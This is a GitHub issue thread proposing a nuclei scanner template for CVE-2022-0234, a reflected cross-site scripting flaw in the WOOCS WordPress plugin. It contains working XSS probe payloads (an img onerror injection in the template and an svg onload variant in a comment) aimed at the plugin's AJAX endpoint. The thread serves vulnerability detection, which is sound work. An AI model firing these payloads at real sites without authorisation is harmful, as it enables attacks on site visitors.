projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Home Page:https://github.com/projectdiscovery/nuclei

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2022-0234

akincibor opened this issue · comments

id: CVE-2022-0234

info:
  name: WOOCS < 1.3.7.5 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/fd568a1f-bd51-41bb-960d-f8573b84527b
  tags: xss,wp,wordpress,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img src onerror=alert(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src onerror=alert(document.domain)>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

@akincibor
Not able to reproduce the vulnerability on the vulnerable plugin, kindly share the debug data.

Hi, could you try this payload %3Csvg%20onload=confirm(1)

@akincibor kindly provide the debug of the response , we are not able to reproduce this on the vulnerable plugin version

Hello @akincibor, thank you so much for sharing this template with the community and contributing to this project 🍻